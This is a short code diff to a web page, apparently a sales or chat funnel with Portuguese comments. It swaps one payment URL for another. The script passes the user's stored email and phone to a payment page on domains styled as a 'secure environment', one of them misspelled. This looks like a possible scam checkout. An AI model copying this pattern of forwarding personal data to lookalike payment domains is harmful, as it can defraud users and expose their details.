--- a/ml/up-1-chat/index.html
+++ b/ml/up-1-chat/index.html
@@ -386,7 +386,7 @@
                     const email = localStorage.getItem('email') || '';
                     const telephone = localStorage.getItem('telefone') || '';
                     
-                    const baseUrl = 'https://pay.ambiente-seguuro.fun/6823713be4bf749bd185ce3a';
+                    const baseUrl = 'https://pay.ambiente-seguro-livre.site/68274a103592a759f11db95d';
                     const url = new URL(baseUrl);
                     
                     // Adicionar parâmetros do usuário
